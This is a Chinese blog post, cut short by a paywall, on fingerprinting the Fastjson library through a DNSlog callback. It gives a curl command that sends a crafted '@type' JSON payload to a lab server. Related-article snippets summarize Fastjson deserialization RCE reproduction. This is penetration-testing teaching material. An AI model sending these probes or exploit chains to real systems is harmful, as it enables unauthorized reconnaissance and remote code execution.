Fastjson漏洞的识别与DNSlog回显

tpaer

已于 2022-09-25 16:06:56 修改

阅读量5.4k

点赞数 1

分类专栏：从入门到入狱文章标签： json 网络安全 java web安全 web

于 2022-09-02 00:25:47 首次发布

本文链接：https://blog.csdn.net/qq_18980147/article/details/126653516

版权

Fastjson 漏洞探测版本识别 RCE攻击网络安全

关键词由CSDN通过智能技术生成

Fastjson的探测方式

模拟使用fastjson的网站 http://192.168.88.111:8090/

方式一

命令行

curl http://192.168.88.111:8090/ -H "Content-Type: application/json" --data '{
   {"@type":"java.net.URL","val":"cegkgu.dnslog.cn"}:0'

识别特征：（出现则使用了Fastjson）

"status":500, "error":"Internal Server Error"

最低0.47元/天解锁文章

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

tpaer

关注关注

1
点赞
踩
7

收藏

觉得还不错? 一键收藏
3
评论
分享

复制链接

分享到 QQ

分享到新浪微博

扫一扫
举报

举报

专栏目录

35-3 使用dnslog探测fastjson漏洞

weixin_43263566的博客

04-10

764

DNSLog是一种记录在DNS上的域名相关信息的机制，类似于日志文件，记录了对域名或IP的访问信息。因特网采用树状结构的命名方法，按照组织结构划分域，每个域都是名字空间中被管理的一个划分，可以进一步划分为子域。当向DNS服务器发起kxsy.work的解析请求时，DNSLog会记录下此次解析，包括解析的域名和对应的IP地址。刷新dnslog服务器的记录，有记录就说明存在漏洞（一开始的4ax的子域名发送请求，刷新看不到，我就获取一个新的子域名做演示，所以下面的截图中的域名跟上一张不一样）将数据包发送到重发器。

Tcsec安全研究院|fastjson漏洞分析

tcsecXD的博客

02-14

2080

fastjson 是一个 Java 库，可用于将 Java 对象转换为其 JSON 表示形式。

3 条评论您还未登录，请先登录后发表或查看评论

Fastjson反序列化漏洞复现

m0_46371267的博客

09-29

1433

Fastjson反序列化漏洞复现

fastjson【1224--rce】漏洞初探索及复现

最新发布

China_I_LOVE的博客

03-20

892

该漏洞，主要就是因为可以出网，并且通过函数导致命令可以在请求的时候，执行相关命令"b":{这是主要利用代码，就是通过json格式的数据传给服务器，可以执行rmi中的class文件的内容。

代码审计-fastjson的dnslog探测方式分析

cdyunaq的博客

12-15

2066

前言正常测试的时候，发现java后端对json处理都会去测试一下是否存在反序列化，但是后端处理json的组件很多，比如fastjson、jackson、gson等，怎么判断是否使用了fastjson呢？有一个简便无危害的方式，就是通过dnslog来判断。大佬们讨论的issue 说明前面我们在分析的时候，会发现很多有一个变量token在进行判断，比如token == 12 或者 token == 14等，那这个token到底代表啥呢？在com.alibaba.fastjson.parser.

通过dnslog探测fastjson的几种方法

Adminxe的博客

05-04

8467

0x01 背景在渗透测试中遇到json数据一般都会测试下有没有反序列化。然而json库有fastjson,jackson,gson等等。怎么判断后端不是fastjson呢？这就需要构造特定的payload了。昨天翻看fastjson源码时发现了一些可以构造dns解析且没在黑名单当中的类，于是顺手给官方提了下Issue。有趣的是后续的师傅们讨论还挺热闹的，我也在这次讨论中学习了很多。这篇...

Fastjson反序列化复现

2301_77315080的博客

10-10

263

将Exploit.class文件和Exploit.java文件同时放在自己的vps上，并且在当前目录下使用如下命令开启一个轻量级的http服务。使用javac Exploit.java编译java文件生成Exploit.class。将如下代码保存为Exploit.java,代码中对应的vps地址换成自己的。生成一个dnslog并查看Dnslog，回显表示有漏洞。使用bp抓包，重发器更改抓包，GET改为POST包。发送json到目标服务器(<=1.2.24)Fastjson插件检测有漏洞。

利用BCEL打fastjson直接burp回显getshell

2201_75353421的博客

08-03

2285

fastjson我曾经写过漏洞的原理，但是公网遇到的漏洞越来越少，大多都是在内网的环境，内网里没办法使用dnslog去探测回显。这里学习一下用bcel链直接在bp中产生回显进而getshell。

FastJson远程命令执行漏洞学习笔记

m0_73257876的博客

09-04

767

fastjson的漏洞其实就是fastjson autotype在处理json对象的时候，未对@type字段进行完全的安全性验证，攻击者可以传入危险类，并调用危险类中连接远程主机，通过其中的恶意类执行代码。笔记只做学习记录分享。如有错误，请大家批评指正！

Fastjson系列漏洞实战和总结

热门推荐

jammny

10-13

2万+

前言 Fastjson是阿里巴巴的开源JSON解析库，它可以解析JSON格式的字符串，支持将Java Bean序列化为JSON字符串，也可以从JSON字符串反序列化到JavaBean。具有执行效率高的特点，应用范围广泛。 Fastjson<1.2.24远程代码执行（CNVD-2017-02833 ）漏洞详情 fastjson在解析json的过程中，支持使用autoType来实例化某一个具体的类，并调用该类的set/get方法来访问属性。通过查找代码中相关的方法，即可构造出一些恶意..

jndi-tool JNDI服务利用工具

01-06

它能够帮助识别是否有可能受到Fastjson或Log4j RCE漏洞的影响，并在高版本JDK环境中进行测试，因为这些漏洞可能在特定JDK版本中更为严重。使用"jndi_tool.jar"文件，用户可以运行这个工具，执行一系列的JNDI查找...

fastjson-c3p0:fastjson不出网回显利用

03-19

fastjson-c3p0 fastjson不出网回显利用 POST /json HTTP/1.1 Host: 127.0.0.1:8999 Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.142 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3 Accept-Encoding: gzip, deflate cmd: dir Acce

护网面试-JAVA漏洞和中间件篇

qq_52579508的博客

04-17

577

中间件IIS漏洞IIS PUT漏洞IIS Server 在 Web 服务扩展中开启了 WebDAV ，配置了可以写入的权限，造成任意文件上传。版本：IIS6.0短文件名猜解漏洞IIS的短文件名机制，可以暴力猜解短文件名，访问构造的某个存在的短文件名，会返回404，访问构造的某个不存在的短文件名，返回400。局限性1) 此漏洞只能确定前6个字符，如果后面的字符太长、包含特殊字符，很难猜解；2) 如果...

go post json 多维_使用DNSlog_GO实现快速检测FastJson

weixin_36254822的博客

12-10

271

Dnslog_Go原本是为了配合我的Httphook项目的一个子项目，目的是为了配合hk实现各种盲漏洞的探测，但是后来看到目前github上的各种dnslog项目都需要，安装各种依赖，于是就把这个项目加了web界面然后开源出来了。不了解的朋友，可以看我的这篇文章十分钟快速自建DNSlog服务器实际上dnslog主要还是为了配合各类脚本进行快速探测，web界面都是次要。为了方便大家使用，和...

fastjson反序列化漏洞复现

san3144393495的博客

04-20

800

通俗理解就是：漏洞利用fastjson autotype在处理json对象的时候，未对@type字段进行完全的安全性验证，攻击者可以传入危险类，并调用危险类连接远程rmi主机，通过其中的恶意类执行代码。攻击者通过这种方式可以实现远程代码执行漏洞的利用，获取服务器的敏感信息泄露，甚至可以利用此漏洞进一步对服务器数据进行修改，增加，删除等操作，对服务器造成巨大影响。FastJson在解析json的过程中，支持使用autoType来实例化某一个具体的类，并调用该类的set/get方法来访问属性。

Fastjson 1.2.24 反序列化(CVE-2017-18349)漏洞复现

HEAVEN569的博客

06-21

1767

Fastjson 1.2.24 反序列化(CVE-2017-18349)漏洞复现

Fastjson显错判断版本号—一

afei001

10-07

1150

当没有做异常处理时，构造特殊字符使得Fastjson报错。方法来自于浅蓝，没有做异常处理会抛出异常，有时候会显示出fastjson版本号来。

Fastjson

N的博客

03-14

2539

Fastjson：我一路向北，离开有你的季节

fastjson与 jackson 黑盒如何辨别

把梦想放飞在蓝色的天空里...

11-25

953

from:某json 黑盒盲测与白盒审计 - 先知社区 (aliyun.com) fastjson与jackson区别，如果请求包中的 json 如下: {"name":"S", "age":21} 追加一个随机 key ,修改 json 为 {"name":"S", "age":21,"agsbdkjada__ss_d":123} 这里 fastjson 是不会报错的, Jackson 因为强制 key 与 javabean 属性对齐,只能少不能多 key, 所以会报错,服务器的响应包中多少会有异常.

fastjson漏洞频发：AutoType特性深入剖析与安全升级

Fastjson作为阿里巴巴的知名开源JSON解析库，在Java开发中广泛应用，然而近期却频繁曝出安全漏洞，引起了开发者们的关注。这些漏洞主要源于其AutoType特性，这个特性原本是为了提供便利，但在实际使用过程中可能导致...